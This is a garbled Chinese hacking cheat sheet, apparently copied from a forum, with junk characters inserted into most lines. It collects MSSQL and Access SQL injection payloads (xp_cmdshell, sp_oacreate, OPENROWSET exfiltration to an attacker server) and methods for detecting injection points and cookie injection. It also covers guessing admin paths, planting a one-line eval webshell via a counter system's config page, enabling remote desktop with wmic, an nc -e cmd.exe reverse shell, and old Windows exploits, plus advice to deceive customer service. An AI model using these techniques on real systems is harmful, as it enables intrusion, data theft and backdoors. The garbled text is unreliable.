SA点数据库分离技术相关
2 _# O0 g! B* X
9 K' t% O- U9 m; c; d% b `. U- r3 M8 m4 ~# }* X c
SA点数据库分离搞法+语句:
( U+ F, Q6 I8 `+ o! J
. R- ?( O) X7 C注射点不显错,执行下面三条语句页面都返回正常。
* b$ g3 p5 @+ C% Zand 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread')" B) @7 q. s* {( |" L' z7 s
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask')) C. {' r1 `% W% y9 O
and 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')6 [- {7 f6 ~4 K5 }! y
可以列目录,判断系统为2000,web与数据库分离
) \$ ^4 I: b( c遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。
, N; R/ _+ F9 j2 d在注射点上执行
! j+ x! |8 p2 h7 z! ]1 }declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--. o8 n+ ]9 b# e
页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP
" T. X( V4 k% ^还有我用NC监听得其他端口都没有得到IP。% q9 e) B+ h, w ]; ?- ]
, H* e$ O; f% x8 i5 u
通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。) I. i5 h4 J5 u0 R& N; ^8 D
'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--; @$ J+ }" J4 ^- C: \. C8 w( I
- K( h* p8 G1 |" j) ?* M;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--
p0 S1 Q9 c. ]: [8 L" g$ F1 ?( q9 |/ \
现在就猜想是不是数据库是内网而且不能连外网。
- @5 A) @5 N |% ~/ p, R) J: _2 q/ q( h3 i' ~
2 d$ K# g8 t; w1 caccess导出txt文本代码1 k: F* g# r6 D/ @4 { ^ t
SELECT * into [test.txt] in 'd:\web\' 'text;' from admin
9 \$ Z% d# H6 f8 e- R6 }* W8 m( P
6 d. Z% X/ u' a6 Z- d" L$ c& ~' n Y) w" {; L v5 F- a. E3 c
自动跳转到指定网站代码头
+ L8 c5 c+ Q F! X% a7 q) Z; O<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>
6 y% N' X$ I6 S7 ]5 c3 \5 W& Q O" U7 y
! h2 K5 L( Z; d% @6 @入侵java or jsp站点时默认配置文件路径:
. [3 N/ p2 r- Z& u4 K\web-inf\web.xml+ X) O& {- E7 f. Y0 Y1 z1 h& n3 t
tomcat下的配置文件位置:
, B! i; y7 a/ q- y$ w\conf\server.xml (前面加上tomcat路径)* `5 h% v/ W; E1 a1 A
\Tomcat 5.0\webapps\root\web-inf\struts-config.xml8 }( D0 L' y/ V) Y7 u' K! z0 p- ~
) w9 G+ R0 G5 N5 d0 u; V
' E) t5 }+ G l$ f6 y2 w- i& }8 C3 [- r2 F* P4 m' Y5 P; k5 ~$ f
检测注入点新方法运算符法,在过滤了and or cookies时用比有效果:
1 T+ r9 b1 U( H' P. N; m4 H3 [; f! N-1%23$ o) U1 P4 V1 `! f4 X R6 z4 v
>
/ m+ h/ N2 J) w3 ?<- l% h; Q9 d* ]) R) ^
1'+or+'1'='1
* t- @9 Q/ Z; I, L1 }/ \id=8%bf+ F& p. h4 c- x; Y& G
5 t) T2 c7 ^" L全新注入点检测试法:9 T; n3 B1 }4 i8 a& e( M
在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。; m0 g' K! `2 [$ \0 r! p! P2 ^1 K- S
; a. X7 r# u3 \$ M- a
在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。. l. X5 c* z7 A0 B9 [1 c& y
/ H4 G; W9 }7 U# `6 f8 B
搜索型注入判断方法:/ X+ R8 d5 r* F1 I* H: x0 h
北京%' and '1'='1' and '%'='
. _5 w6 t7 k. w- f北京%' and '1'='2' and '%'='; A4 U! M# C$ o* I' Q8 T1 f- f+ }
' |' t0 r& M' E& e I8 m5 z9 C& u- _
COOKIES注入:
. R7 G o) J- s) I
9 I n2 t/ R9 ?+ [/ x/ sjavascript:alert(document.cookie="id="+escape("51 and 1=1"));
; d/ l; ?' q$ C! d6 ?
7 T" g* u, _* W" y0 Q1 B, Y. d& E1 c b2000专业版查看本地登录用户命令:2 e$ Z8 w- C- [5 _6 ~6 T/ H
net config workstation5 v% v/ A; W& v9 @; ^
% W" W& }2 y/ o) w7 l: P0 I
; y$ [' [3 Z) b* M& q; u2003下查看ipsec配置和默认防火墙配置命令:
5 @( I, m \8 z" [/ ynetsh firewall show config
9 P2 \; D% @; o8 S& Y2 w! S" ]netsh ipsec static show all
& `% u5 i1 o, G- x8 X% h' e! e
9 I. d- s+ |, X3 p6 |. Z0 Y不指派指定策略命令:' Z/ n/ `& u" K# ~$ q
netsh ipsec static set policy name=test assign=n (test是不指派的策略名)* L5 @7 Q- L1 c$ g6 s
netsh ipsec static show policy all 显示策略名% @0 H& }$ m0 Z' c
8 `* \; Y% M$ V% |1 ^5 Q5 t
( [% O4 {( ^* B- D) u猜管理员后台小技巧:
$ s& i8 x/ m8 Y; Xadmin/left.asp + h' z8 B: Q2 p6 @) N @' c
admin/main.asp. v1 i! B/ q9 A [ E
admin/top.asp
' p$ ?% U+ J' [- K" Madmin/admin.asp : H; a; p6 O& |; v6 ]' j4 \
会现出菜单导航,然后迅雷下载全部链接
( L- f3 n- @! Q: `) h) E: Z
5 h& ^6 J, n+ K9 u/ l* O, l. n6 H: x, I0 m
社会工程学:
+ g0 S* J3 u: U2 H5 G用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人
L2 X5 @! ]2 S7 m. v( b. g2 j+ B然后去骗客服0 E; z+ X }! x4 @3 ? u9 ]3 n. w
1 @1 J/ X4 f2 s. ?5 t q5 Y
' l( E% ~1 }' O# D/ K
统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码: : r/ H7 ?3 i# w: h( w
查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">,
* Z/ x+ Z3 b0 q 存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。
% P1 V2 t- p3 X; g, y* A7 A7 A+ E- u" }1 H, b! I* t! ~8 V
* b8 f8 o5 I( f& r' ]
. F% w u( c$ [/ I2 p9 O6 h6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)
1 V6 ]5 P/ u$ Q2 o6 u W' X( v2 M! \3 b- W
& j- i5 J. }2 X6 y: Q9 F- [. Y" \* X% {6 ^: N c j0 v
CMD加密注册表位置
- x, ^; ?' [3 w) `# J. a(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor
: o% K7 N* |; p6 IAutoRun
$ H6 l- o4 H+ X6 u' H1 b' y# _1 x$ p4 G) w/ T
(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor% c' d, U# J: p% i
AutoRun7 N4 d8 w/ w% V# N" k8 l
m& a; H1 R2 Q2 O5 {2 p
) a7 D! \+ W7 B* R9 T
在找注入时搜索Hidden,把他改成test
e: P" H" q, e' S/ o4 R
( N$ ]9 f- `2 K2 a, I
+ L* ~. c9 n0 ^9 c2 I3 f" F% F( J6 b3 U0 a! U) e; `
mstsc /v:IP /console & }7 I% N6 ?' f |/ l& f
, | \, {4 z1 k! `" i: ^! y; S- Y7 [) v. j; w6 o
一句话开3389:
$ d1 \& C& W* X- T, D- ^
1 z6 _' S2 L& v3 ~( y) Y: t. i: }8 h0 b最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH>
- c9 P. }1 ^6 h2 h/ ^" I- T开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1 就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了.
l U6 Z5 e3 z. t8 Y- `* I) B5 x+ s* S
7 m" a4 l5 \2 `% x知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:
/ D! f: @; U9 S- A5 w; {Insert into admin(user,pwd) values('test','test')
8 u/ y$ ~. V( f3 H) p1 D
$ Y9 y; L( ]4 {2 e% i$ m7 D! i/ T/ s. H* t5 R6 i4 S* [
NC反弹
S4 V" ^& H; a先在本机执行: nc -vv -lp 监听的端口 (自己执行) 8 V+ M4 i% n0 R C* l
然后在服务器上执行: nc -e cmd.exe 自己的IP 和监听的端口 (对方执行)
- s& b0 S4 D) f* f8 W* n4 t8 k2 L- T
! S5 S! ~& @4 n
在脚本入侵过程中要经常常试用%00来确认下参数是否有问题; \/ i/ t( o7 T
+ F0 p/ P0 w5 f% ]2 k/ ~# ~7 X/ g$ y
有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录
! T: r. @" d8 l; ]2 l9 I例如:
" _. S2 ~9 [' zsubst k: d:\www\ 用d盘www目录替代k盘
/ M' }$ X; @. T3 w9 P$ N* J4 ^subst k: /d 解除K盘代替 |